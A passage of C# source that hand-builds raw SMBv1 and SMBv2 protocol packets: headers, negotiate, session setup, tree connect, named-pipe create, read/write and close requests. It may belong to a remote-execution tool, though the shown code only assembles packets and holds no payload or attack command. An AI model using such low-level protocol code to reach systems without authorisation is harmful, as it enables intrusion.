21 | packet_netbios_session_service_length = new byte[] { packet_netbios_session_service_length[2], packet_netbios_session_service_length[1], packet_netbios_session_service_length[0] };
22 |
23 | OrderedDictionary packet_NetBIOSSessionService = new OrderedDictionary();
24 | packet_NetBIOSSessionService.Add("NetBIOSSessionService_Message_Type", new byte[] { 0x00 });
25 | packet_NetBIOSSessionService.Add("NetBIOSSessionService_Length", packet_netbios_session_service_length);
26 |
27 | return packet_NetBIOSSessionService;
28 | }
29 | public static OrderedDictionary SMBHeader(byte[] packet_command, byte[] packet_flags, byte[] packet_flags2, byte[] packet_tree_ID, byte[] packet_process_ID, byte[] packet_user_ID)
30 | {
31 | byte[] ProcessID = new byte[2] { packet_process_ID[0], packet_process_ID[1] };
32 | OrderedDictionary packet_SMBHeader = new OrderedDictionary();
33 | packet_SMBHeader.Add("SMBHeader_Protocol", new byte[] { 0xff, 0x53, 0x4d, 0x42 });
34 | packet_SMBHeader.Add("SMBHeader_Command", packet_command);
35 | packet_SMBHeader.Add("SMBHeader_ErrorClass", new byte[] { 0x00 });
36 | packet_SMBHeader.Add("SMBHeader_Reserved", new byte[] { 0x00 });
37 | packet_SMBHeader.Add("SMBHeader_ErrorCode", new byte[] { 0x00, 0x00 });
38 | packet_SMBHeader.Add("SMBHeader_Flags", packet_flags);
39 | packet_SMBHeader.Add("SMBHeader_Flags2", packet_flags2);
40 | packet_SMBHeader.Add("SMBHeader_ProcessIDHigh", new byte[] { 0x00, 0x00 });
41 | packet_SMBHeader.Add("SMBHeader_Signature", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
42 | packet_SMBHeader.Add("SMBHeader_Reserved2", new byte[] { 0x00, 0x00 });
43 | packet_SMBHeader.Add("SMBHeader_TreeID", packet_tree_ID);
44 | packet_SMBHeader.Add("SMBHeader_ProcessID", ProcessID);
45 | packet_SMBHeader.Add("SMBHeader_UserID", packet_user_ID);
46 | packet_SMBHeader.Add("SMBHeader_MultiplexID", new byte[] { 0x00, 0x00 });
47 | return packet_SMBHeader;
48 | }
49 | public static OrderedDictionary SMBNegotiateProtocolRequest(bool ForceSMB1)
50 | {
51 | byte[] packet_byte_count;
52 | if (ForceSMB1)
53 | {
54 | packet_byte_count = new byte[] { 0x0c, 0x00 };
55 | }
56 | else
57 | {
58 | packet_byte_count = new byte[] { 0x22, 0x00 };
59 | }
60 | //https://msdn.microsoft.com/en-us/library/ee441572.aspx
61 | OrderedDictionary packet_SMBNegotiateProtocolRequest = new OrderedDictionary();
62 | packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_WordCount", new byte[] { 0x00 });
63 | packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_ByteCount", packet_byte_count);
64 | packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat", new byte[] { 0x02 });
65 | packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name", new byte[] { 0x4e, 0x54, 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00 });
66 |
67 | if (!ForceSMB1)
68 | {
69 | packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat2", new byte[] { 0x02 });
70 | packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name2", new byte[] { 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e, 0x30, 0x30, 0x32, 0x00 });
71 | packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat3", new byte[] { 0x02 });
72 | packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name3", new byte[] { 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e, 0x3f, 0x3f, 0x3f, 0x00 });
73 | }
74 |
75 | return packet_SMBNegotiateProtocolRequest;
76 | }
77 | public static OrderedDictionary SMBSessionSetupAndXRequest(byte[] packet_security_blob)
78 | {
79 | //https://msdn.microsoft.com/en-us/library/ee441849.aspx
80 |
81 |
82 | byte[] packet_byte_count = BitConverter.GetBytes(packet_security_blob.Length);
83 | byte[] packet_byte_count2 = { packet_byte_count[0], packet_byte_count[1] };
84 | byte[] packet_security_blob_length = BitConverter.GetBytes(packet_security_blob.Length + 5);
85 | byte[] packet_security_blob_length2 = { packet_security_blob_length[0], packet_security_blob_length[1] };
86 |
87 | OrderedDictionary packet_SMBSessionSetupAndXRequest = new OrderedDictionary();
88 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_WordCount", new byte[] { 0x0c });
89 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXCommand", new byte[] { 0xff });
90 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved", new byte[] { 0x00 });
91 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
92 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxBuffer", new byte[] { 0xff, 0xff });
93 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxMpxCount", new byte[] { 0x02, 0x00 });
94 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_VCNumber", new byte[] { 0x01, 0x00 });
95 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SessionKey", new byte[] { 0x00, 0x00, 0x00, 0x00 });
96 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlobLength", packet_byte_count2);
97 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
98 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Capabilities", new byte[] { 0x44, 0x00, 0x00, 0x80 });
99 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_ByteCount", packet_security_blob_length2);
100 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlob", packet_security_blob);
101 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeOS", new byte[] { 0x00, 0x00, 0x00 });
102 | packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeLANManage", new byte[] { 0x00, 0x00 });
103 |
104 | return packet_SMBSessionSetupAndXRequest;
105 | }
106 | public static OrderedDictionary SMBTreeConnectAndXRequest(byte[] packet_path)
107 | {
108 | byte[] packet_path_length = BitConverter.GetBytes(packet_path.Length + 7);
109 | packet_path_length = new byte[] { packet_path_length[0], packet_path_length[1] };
110 |
111 | OrderedDictionary packet_SMBTreeConnectAndXRequest = new OrderedDictionary();
112 | packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_WordCount", new byte[] { 0x04 });
113 | packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXCommand", new byte[] { 0xff });
114 | packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Reserved", new byte[] { 0x00 });
115 | packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
116 | packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Flags", new byte[] { 0x00, 0x00 });
117 | packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_PasswordLength", new byte[] { 0x01, 0x00 });
118 | packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_ByteCount", packet_path_length);
119 | packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Password", new byte[] { 0x00 });
120 | packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Tree", packet_path);
121 | packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Service", new byte[] { 0x3f, 0x3f, 0x3f, 0x3f, 0x3f, 0x00 });
122 |
123 | return packet_SMBTreeConnectAndXRequest;
124 | }
125 | public static OrderedDictionary SMBNTCreateAndXRequest(byte[] packet_named_pipe)
126 | {
127 | byte[] packet_named_pipe_length = BitConverter.GetBytes(packet_named_pipe.Length);
128 | byte[] packet_named_pipe_length2 = { packet_named_pipe_length[0], packet_named_pipe_length[1] };
129 | byte[] packet_file_name_length = BitConverter.GetBytes(packet_named_pipe.Length - 1);
130 | byte[] packet_file_name_length2 = { packet_file_name_length[0], packet_file_name_length[1] };
131 |
132 | OrderedDictionary packet_SMBNTCreateAndXRequest = new OrderedDictionary();
133 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_WordCount", new byte[] { 0x18 });
134 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXCommand", new byte[] { 0xff });
135 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved", new byte[] { 0x00 });
136 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
137 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved2", new byte[] { 0x00 });
138 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileNameLen", packet_file_name_length2);
139 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateFlags", new byte[] { 0x16, 0x00, 0x00, 0x00 });
140 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_RootFID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
141 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AccessMask", new byte[] { 0x00, 0x00, 0x00, 0x02 });
142 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AllocationSize", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
143 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileAttributes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
144 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ShareAccess", new byte[] { 0x07, 0x00, 0x00, 0x00 });
145 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Disposition", new byte[] { 0x01, 0x00, 0x00, 0x00 });
146 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateOptions", new byte[] { 0x00, 0x00, 0x00, 0x00 });
147 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Impersonation", new byte[] { 0x02, 0x00, 0x00, 0x00 });
148 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_SecurityFlags", new byte[] { 0x00 });
149 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ByteCount", packet_named_pipe_length2);
150 | packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Filename", packet_named_pipe);
151 |
152 | return packet_SMBNTCreateAndXRequest;
153 | }
154 | public static OrderedDictionary SMBReadAndXRequest(byte[] SMB_FID)
155 | {
156 |
157 | if (SMB_FID == null)
158 | {
159 | SMB_FID = new byte[] { 0x00, 0x40 };
160 | }
161 | OrderedDictionary packet_SMBReadAndXRequest = new OrderedDictionary();
162 | packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_WordCount", new byte[] { 0x0a });
163 | packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXCommand", new byte[] { 0xff });
164 | packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Reserved", new byte[] { 0x00 });
165 | packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
166 | packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_FID", SMB_FID);
167 | packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
168 | packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MaxCountLow", new byte[] { 0x58, 0x02 });
169 | packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MinCount", new byte[] { 0x58, 0x02 });
170 | packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Unknown", new byte[] { 0xff, 0xff, 0xff, 0xff });
171 | packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Remaining", new byte[] { 0x00, 0x00 });
172 | packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_ByteCount", new byte[] { 0x00, 0x00 });
173 |
174 | return packet_SMBReadAndXRequest;
175 | }
176 | public static OrderedDictionary SMBWriteAndXRequest(byte[] packet_file_ID, int packet_RPC_length)
177 | {
178 | byte[] packet_write_length = BitConverter.GetBytes(packet_RPC_length);
179 | packet_write_length = new byte[] { packet_write_length[0], packet_write_length[1] };
180 |
181 | OrderedDictionary packet_SMBWriteAndXRequest = new OrderedDictionary();
182 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WordCount", new byte[] { 0x0e });
183 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXCommand", new byte[] { 0xff });
184 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved", new byte[] { 0x00 });
185 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
186 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_FID", packet_file_ID);
187 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Offset", new byte[] { 0xea, 0x03, 0x00, 0x00 });
188 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved2", new byte[] { 0xff, 0xff, 0xff, 0xff });
189 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WriteMode", new byte[] { 0x08, 0x00 });
190 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Remaining", packet_write_length);
191 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthHigh", new byte[] { 0x00, 0x00 });
192 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthLow", packet_write_length);
193 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataOffset", new byte[] { 0x3f, 0x00 });
194 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_HighOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
195 | packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_ByteCount", packet_write_length);
196 |
197 | return packet_SMBWriteAndXRequest;
198 | }
199 | public static OrderedDictionary SMBCloseRequest(byte[] packet_file_ID)
200 | {
201 |
202 | OrderedDictionary packet_SMBCloseRequest = new OrderedDictionary();
203 | packet_SMBCloseRequest.Add("SMBCloseRequest_WordCount", new byte[] { 0x03 });
204 | packet_SMBCloseRequest.Add("SMBCloseRequest_FID", packet_file_ID);
205 | packet_SMBCloseRequest.Add("SMBCloseRequest_LastWrite", new byte[] { 0xff, 0xff, 0xff, 0xff });
206 | packet_SMBCloseRequest.Add("SMBCloseRequest_ByteCount", new byte[] { 0x00, 0x00 });
207 |
208 | return packet_SMBCloseRequest;
209 | }
210 | public static OrderedDictionary SMBTreeDisconnectRequest()
211 | {
212 | OrderedDictionary packet_SMBTreeDisconnectRequest = new OrderedDictionary();
213 | packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_WordCount", new byte[] { 0x00 });
214 | packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_ByteCount", new byte[] { 0x00, 0x00 });
215 | return packet_SMBTreeDisconnectRequest;
216 | }
217 | public static OrderedDictionary SMBLogoffAndXRequest()
218 | {
219 | OrderedDictionary packet_SMBLogoffAndXRequest = new OrderedDictionary();
220 | packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_WordCount", new byte[] { 0x02 });
221 | packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXCommand", new byte[] { 0xff });
222 | packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_Reserved", new byte[] { 0x00 });
223 | packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
224 | packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_ByteCount", new byte[] { 0x00, 0x00 });
225 | return packet_SMBLogoffAndXRequest;
226 | }
227 | #endregion
228 | #region SMBv2
229 | //public static OrderedDictionary SMB2Header(byte[] packet_command,bool SMB_signing, int packet_message_ID, byte[] process_id, byte[] packet_tree_ID, byte[] packet_session_ID)
230 | public static OrderedDictionary SMB2Header(byte[] packet_command, int packet_message_ID, byte[] packet_tree_ID, byte[] packet_session_ID)
231 | {
232 |
233 | byte[] message_ID = BitConverter.GetBytes(packet_message_ID);
234 |
235 | if (message_ID.Length == 4)
236 | {
237 | message_ID = message_ID.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
238 | //message_ID = Utilities.CombineByteArray(message_ID, new byte[] { 0x00, 0x00, 0x00, 0x00 });
239 | }
240 |
241 | OrderedDictionary packet_SMB2Header = new OrderedDictionary();
242 | packet_SMB2Header.Add("SMB2Header_ProtocolID", new byte[] { 0xfe, 0x53, 0x4d, 0x42 });
243 | packet_SMB2Header.Add("SMB2Header_StructureSize", new byte[] { 0x40, 0x00 });
244 | packet_SMB2Header.Add("SMB2Header_CreditCharge", new byte[] { 0x01, 0x00 });
245 | packet_SMB2Header.Add("SMB2Header_ChannelSequence", new byte[] { 0x00, 0x00 });
246 | packet_SMB2Header.Add("SMB2Header_Reserved", new byte[] { 0x00, 0x00 });
247 | packet_SMB2Header.Add("SMB2Header_Command", packet_command);
248 | packet_SMB2Header.Add("SMB2Header_CreditRequest", new byte[] { 0x00, 0x00 });
249 | packet_SMB2Header.Add("SMB2Header_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
250 | packet_SMB2Header.Add("SMB2Header_NextCommand", new byte[] { 0x00, 0x00, 0x00, 0x00 });
251 | packet_SMB2Header.Add("SMB2Header_MessageID", message_ID);
252 | packet_SMB2Header.Add("SMB2Header_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
253 | packet_SMB2Header.Add("SMB2Header_TreeID", packet_tree_ID);
254 | packet_SMB2Header.Add("SMB2Header_SessionID", packet_session_ID);
255 | packet_SMB2Header.Add("SMB2Header_Signature", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
256 |
257 | return packet_SMB2Header;
258 |
259 | }
260 | public static OrderedDictionary SMB2NegotiateProtocolRequest()
261 | {
262 | OrderedDictionary packet_SMB2NegotiateProtocolRequest = new OrderedDictionary();
263 | packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_StructureSize", new byte[] { 0x24, 0x00 });
264 | packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_DialectCount", new byte[] { 0x02, 0x00 });
265 | packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_SecurityMode", new byte[] { 0x01, 0x00 });
266 | packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved", new byte[] { 0x00, 0x00 });
267 | packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Capabilities", new byte[] { 0x40, 0x00, 0x00, 0x00 });
268 | packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_ClientGUID", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
269 | packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
270 | packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextCount", new byte[] { 0x00, 0x00 });
271 | packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved2", new byte[] { 0x00, 0x00 });
272 | packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect", new byte[] { 0x02, 0x02 });
273 | packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect2", new byte[] { 0x10, 0x02 });
274 |
275 | return packet_SMB2NegotiateProtocolRequest;
276 | }
277 | public static OrderedDictionary SMB2SessionSetupRequest(byte[] packet_security_blob)
278 | {
279 | byte[] packet_security_blob_length = BitConverter.GetBytes(packet_security_blob.Length);
280 | byte[] packet_security_blob_length2 = { packet_security_blob_length[0], packet_security_blob_length[1] };
281 |
282 | OrderedDictionary packet_SMB2SessionSetupRequest = new OrderedDictionary();
283 | packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_StructureSize", new byte[] { 0x19, 0x00 });
284 | packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Flags", new byte[] { 0x00 });
285 | packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityMode", new byte[] { 0x01 });
286 | packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Capabilities", new byte[] { 0x00, 0x00, 0x00, 0x00 });
287 | packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
288 | packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferOffset", new byte[] { 0x58, 0x00 });
289 | packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferLength", packet_security_blob_length2);
290 | packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_PreviousSessionID", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
291 | packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Buffer", packet_security_blob);
292 |
293 | return packet_SMB2SessionSetupRequest;
294 | }
295 | public static OrderedDictionary SMB2TreeConnectRequest(byte[] packet_path)
296 | {
297 |
298 | byte[] packet_path_length = BitConverter.GetBytes(packet_path.Length);
299 | packet_path_length = new byte[] { packet_path_length[0], packet_path_length[1] };
300 | OrderedDictionary packet_SMB2TreeConnectRequest = new OrderedDictionary();
301 | packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_StructureSize", new byte[] { 0x09, 0x00 });
302 | packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Reserved", new byte[] { 0x00, 0x00 });
303 | packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathOffset", new byte[] { 0x48, 0x00 });
304 | packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathLength", packet_path_length);
305 | packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Buffer", packet_path);
306 |
307 | return packet_SMB2TreeConnectRequest;
308 | }
309 | public static OrderedDictionary SMB2CreateRequestFile(byte[] packet_named_pipe)
310 | {
311 | byte[] packet_named_pipe_length = BitConverter.GetBytes(packet_named_pipe.Length);
312 | byte[] packet_named_pipe_length2 = { packet_named_pipe_length[0], packet_named_pipe_length[1] };
313 | OrderedDictionary packet_SMB2CreateRequestFile = new OrderedDictionary();
314 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_StructureSize", new byte[] { 0x39, 0x00 });
315 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Flags", new byte[] { 0x00 });
316 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_RequestedOplockLevel", new byte[] { 0x00 });
317 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Impersonation", new byte[] { 0x02, 0x00, 0x00, 0x00 });
318 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_SMBCreateFlags", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
319 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
320 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_DesiredAccess", new byte[] { 0x03, 0x00, 0x00, 0x00 });
321 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_FileAttributes", new byte[] { 0x80, 0x00, 0x00, 0x00 });
322 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_ShareAccess", new byte[] { 0x01, 0x00, 0x00, 0x00 });
323 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateDisposition", new byte[] { 0x01, 0x00, 0x00, 0x00 });
324 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateOptions", new byte[] { 0x40, 0x00, 0x00, 0x00 });
325 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameOffset", new byte[] { 0x78, 0x00 });
326 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameLength", packet_named_pipe_length2);
327 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
328 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsLength", new byte[] { 0x00, 0x00, 0x00, 0x00 });
329 | packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Buffer", packet_named_pipe);
330 |
331 | return packet_SMB2CreateRequestFile;
332 |
333 | }
334 | public static OrderedDictionary SMB2ReadRequest(byte[] packet_file_ID)
335 | {
336 | OrderedDictionary packet_SMB2ReadRequest = new OrderedDictionary();
337 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_StructureSize", new byte[] { 0x31, 0x00 });
338 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_Padding", new byte[] { 0x50 });
339 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_Flags", new byte[] { 0x00 });
340 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_Length", new byte[] { 0x00, 0x00, 0x10, 0x00 });
341 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
342 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_FileID", packet_file_ID);
343 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_MinimumCount", new byte[] { 0x00, 0x00, 0x00, 0x00 });
344 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
345 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_RemainingBytes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
346 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoOffset", new byte[] { 0x00, 0x00 });
347 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoLength", new byte[] { 0x00, 0x00 });
348 | packet_SMB2ReadRequest.Add("SMB2ReadRequest_Buffer", new byte[] { 0x30 });
349 |
350 | return packet_SMB2ReadRequest;
351 | }
352 | public static OrderedDictionary SMB2WriteRequest(byte[] packet_file_ID, int packet_RPC_length)
353 | {
354 |
355 |
356 | byte[] packet_write_length = BitConverter.GetBytes(packet_RPC_length);
357 | OrderedDictionary packet_SMB2WriteRequest = new OrderedDictionary();
358 | packet_SMB2WriteRequest.Add("SMB2WriteRequest_StructureSize", new byte[] { 0x31, 0x00 });
359 | packet_SMB2WriteRequest.Add("SMB2WriteRequest_DataOffset", new byte[] { 0x70, 0x00 });
360 | packet_SMB2WriteRequest.Add("SMB2WriteRequest_Length", packet_write_length);
361 | packet_SMB2WriteRequest.Add("SMB2WriteRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
362 | packet_SMB2WriteRequest.Add("SMB2WriteRequest_FileID", packet_file_ID);
363 | packet_SMB2WriteRequest.Add("SMB2WriteRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
364 | packet_SMB2WriteRequest.Add("SMB2WriteRequest_RemainingBytes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
365 | packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoOffset", new byte[] { 0x00, 0x00 });
366 | packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoLength", new byte[] { 0x00, 0x00 });
367 | packet_SMB2WriteRequest.Add("SMB2WriteRequest_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
368 |
369 |
370 | return packet_SMB2WriteRequest;
371 | }
372 | public static OrderedDictionary SMB2CloseRequest(byte[] packet_file_ID)
373 | {
374 | OrderedDictionary packet_SMB2CloseRequest = new OrderedDictionary();
375 | packet_SMB2CloseRequest.Add("SMB2CloseRequest_StructureSize", new byte[] { 0x18, 0x00 });
376 | packet_SMB2CloseRequest.Add("SMB2CloseRequest_Flags", new byte[] { 0x00, 0x00 });
377 | packet_SMB2CloseRequest.Add("SMB2CloseRequest_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00 });
378 | packet_SMB2CloseRequest.Add("SMB2CloseRequest_FileID", packet_file_ID);
379 | return packet_SMB2CloseRequest;
380 | }
381 | public static OrderedDictionary SMB2TreeDisconnectRequest()
382 | {
383 | OrderedDictionary packet_SMB2TreeDisconnectRequest = new OrderedDictionary();
